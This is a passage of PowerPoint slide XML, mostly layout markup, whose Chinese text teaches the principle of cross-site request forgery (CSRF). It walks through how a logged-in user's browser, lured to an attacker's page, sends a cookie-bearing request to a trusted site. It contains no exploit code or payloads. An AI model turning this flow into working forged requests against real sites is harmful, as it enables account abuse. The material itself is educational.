              </a:rPr>
              <a:t>服务器也没有被入侵。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519819" y="1896491"/>
            <a:ext cx="2385822" cy="195834"/>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730387" y="2216531"/>
            <a:ext cx="3154679" cy="253745"/>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7</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117221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CSR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="880276"/>
            <a:ext cx="3399154" cy="238125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击描述了以下两个重</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>点</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：其一</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的攻击是建立在浏览器与</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eb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>服务器 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的会话中；其二是攻击者欺骗用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，诱导用户访问攻击者发来</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605421" y="1406525"/>
            <a:ext cx="1895094" cy="731519"/>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609993" y="1411097"/>
            <a:ext cx="1887220" cy="721995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1887220" h="721994">
                <a:moveTo>
                  <a:pt x="0" y="721613"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886712" y="721613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="721613"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246510" y="2178720"/>
            <a:ext cx="543560" cy="124460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2516003" y="1368708"/>
            <a:ext cx="1787525" cy="1250950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="18415" indent="95885">
              <a:lnSpc>
                <a:spcPct val="103600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buSzPct val="81818"/>
              <a:buFont typeface=""/>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="292735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="125">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>打开浏览器，访问受信任的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>输 入用户名和密码请求登录</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="95885">
              <a:lnSpc>
                <a:spcPct val="104500"/>
              </a:lnSpc>
              <a:buSzPct val="81818"/>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="292735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="135">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>信息通过验证后</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>产生</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cookie  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>信息并返回给浏览器，此时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="125">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>登录</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>成功，可 以正常发送请求到</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="18415" indent="95885">
              <a:lnSpc>
                <a:spcPct val="104500"/>
              </a:lnSpc>
              <a:buSzPct val="81818"/>
              <a:buFont typeface=""/>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="292735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="125">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>未退出</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="125">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>之前，在同一浏览器中，  打开攻击者发来的网页访问</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="22225" indent="95885">
              <a:lnSpc>
                <a:spcPct val="104500"/>
              </a:lnSpc>
              <a:buSzPct val="81818"/>
              <a:buFont typeface=""/>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="292735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>接收到</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="120">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>请求后，返回一些攻击性 代码，并发出一个请求要求访问第三方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="12065" indent="95885">
              <a:lnSpc>
                <a:spcPts val="690"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
              <a:buSzPct val="81818"/>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="292735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>浏览器在接收到这些攻击性代码后，根据</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>的请求，在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="120">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>不知情的情况下携带</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>信息，  向</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>发出请求。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>并不知道该请求其实是由 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
